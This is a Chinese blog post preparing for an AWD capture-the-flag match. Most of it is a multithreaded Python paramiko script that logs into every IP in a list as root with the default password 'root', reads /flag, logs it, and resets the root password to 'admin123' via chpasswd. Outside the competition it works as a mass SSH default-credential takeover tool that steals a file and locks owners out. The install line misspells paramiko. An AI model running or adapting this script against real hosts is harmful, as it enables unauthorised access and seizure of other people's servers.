前言
最近在紧张备战AWD线下赛,没什么经验,防止有全场密码一样的情况,直接写脚本cat全场flag,然后修改系统密码。
编写记录
paramiko的安装
pip install parmiko
简单的ssh连接例子
import paramiko
import sys
def SshCon(ip,prot,user,passwd):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip,prot,user,passwd,timeout=1.5)
stdin, stdout, stderr = ssh.exec_command('df')
result=stdout.read()
if(result):
print("Success")
except Exception as e:
pass
SshCon('127.0.0.1',22,'root','root')
从例子中不难看出,在执行一条shell后悔返回shell的执行结果,这个结果是字节类型,所以对返回结果处理时候可以转换为字符串类型。
修改密码只需执行一条命令
stdin, stdout, stderr = ssh.exec_command("echo 'root:admin123'|chpasswd")
多线程对多个IP进行爆破demo
import threading
try:
import queue
except:
from Queue import Queue
class Ssh(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self._queue=queue
def run(self):
while not self._queue.empty():
try:
iplist=self._queue.get()
self.SshCon(iplist)
def SshCon(self,ip):
'''略'''
def main():
try:
Myqueue = Queue()
except:
Myqueue = queue.Queue()
with open("ssh.txt") as dic:
for i in dic:
Myqueue.put(i.strip('\n'))
threads = []
threadsCount=50
for i in range(threadsCount):
threads.append(Ssh(Myqueue))
for t in threads:
t.start()
for t in threads:
t.join()
完整脚本
#!/usr/bin/env python
#-*-coding:utf-8-*-
import paramiko
import sys
import threading
import os
import time
try:
import queue
except:
from Queue import Queue
class SshSimplepass(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self._queue=queue
def run(self):
while not self._queue.empty():
try:
iPlist=self._queue.get()
self.SshCheck(iPlist)
except:
pass
def SshCheck(self,ip):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 跳过了远程连接中选择‘是’的环节,
try:
ssh.connect(ip, 22, 'root', 'root',timeout=1.5)
stdin, stdout, stderr = ssh.exec_command('df')
result=stdout.read()
if not result is None:
stdin, stdout, stderr = ssh.exec_command('cat /flag')
result = str(stdout.read(),encoding="utf-8")
sys.stdout.write('\033[5;32m'+'[+]'+'\t'+ip+'\t'+result+'\n')
with open(filename) as file:
if ip not in file.read():
f = open(filename,'a+')
f.write(ip+'\t'+result)
f.close()
stdin, stdout, stderr = ssh.exec_command("echo 'root:admin123'|chpasswd")
print(stdout.read())
except Exception as e:
pass
#sys.stdout.write('\033[31m'+"[NOT]"+'\t'+ip+"\n")
finally:
ssh.close()
def main(threadsCounts):
try:
Myqueue = Queue()
except:
Myqueue = queue.Queue()
with open("ssh.txt") as dic:
for line in dic:
Myqueue.put(line.strip('\n'))
threads=[]
threadsCount=int(threadsCounts)
for i in range(threadsCount):
threads.append(SshSimplepass(Myqueue))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__=='__main__':
if len(sys.argv) != 2:
sys.stdout.write("Enter:python %s threads" %(sys.argv[0]))
else:
path="result/"
filename=path+'/'+str(time.strftime("%Y-%m-%d", time.localtime()))+".txt"
isExists=os.path.exists(path)
if not isExists:
os.makedirs(path)
f = open(filename,"a+")
f.close()
main(sys.argv[1])